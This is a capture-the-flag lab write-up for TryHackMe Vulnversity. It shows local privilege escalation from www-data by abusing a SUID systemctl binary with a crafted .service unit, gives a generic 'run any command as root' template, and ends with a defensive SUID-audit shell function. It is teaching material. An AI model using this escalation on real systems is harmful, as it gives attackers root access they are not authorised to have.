THM Vulnversity - Privilege Escalation


We found a vulnerable web server, uploaded a PHP reverse shell, and activated it.

We end up as the user www-data.

  • To begin escalating privileges, we first use Python to get an interactive shell:
    python -c 'import pty;pty.spawn("/bin/bash")'

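  • We know that /bin/systemctl is vulnerable because it has the SUID bit set, so it runs with its owner's (root's) privileges no matter who invokes it. We therefore need a shell variable, $priv, that holds the path of a .service unit file, which will then run with root access.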

  • Execute the following code:

    echo '[Service]
    ExecStart=/bin/bash -c "cat /root/root.txt > /opt/flag"
    [Install]
    WantedBy=multi-user.target' > $priv
    
  • Then we need to link it:

    /bin/systemctl link $priv
    
  • And run it:

    /bin/systemctl enable --now $priv
    

In the future, use this systemctl SUID exploit to do whatever you need root to do by changing the string after -c:

    echo '[Service]
    ExecStart=/bin/bash -c "YOUR COMMAND AS ROOT GOES HERE"
    [Install]
    WantedBy=multi-user.target' > $priv
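
From the defender's side, everything above depends on one misconfiguration: the SUID bit on /bin/systemctl. The audit below is an added example, not part of the original write-up; the function name audit_suid and the SUID_WATCHLIST variable are hypothetical, and paths containing newlines are not handled.

```shell
#!/bin/sh
# Added example: list SUID executables under the given directories and flag
# any whose name is on a watchlist of binaries that must never be SUID.

# Basenames to flag. systemctl is the binary this page covers; extending the
# list for your own environment is left to the operator (assumption).
SUID_WATCHLIST="${SUID_WATCHLIST:-systemctl}"

# audit_suid DIR...
# Prints one line per SUID regular file found:
#   "FLAG <path>"  basename is on the watchlist
#   "suid <path>"  any other SUID file, for manual review
# Returns 1 if at least one file was flagged, 0 otherwise.
audit_suid() {
    _report=$(
        find "$@" -xdev -type f -perm -4000 2>/dev/null | sort |
        while IFS= read -r _path; do
            _tag=suid
            for _w in $SUID_WATCHLIST; do
                if [ "${_path##*/}" = "$_w" ]; then
                    _tag=FLAG
                fi
            done
            printf '%s %s\n' "$_tag" "$_path"
        done
    )
    if [ -n "$_report" ]; then
        printf '%s\n' "$_report"
    fi
    if printf '%s\n' "$_report" | grep -q '^FLAG '; then
        return 1
    fi
    return 0
}

# Typical use on a host (run as root so every directory is readable):
#   audit_suid /bin /sbin /usr/bin /usr/sbin /usr/local/bin
# Remediation for a flagged file is to clear the bit:
#   chmod u-s /bin/systemctl
```

A non-zero exit status makes the function easy to wire into a configuration-compliance job or a scheduled check that alerts when a flagged binary appears.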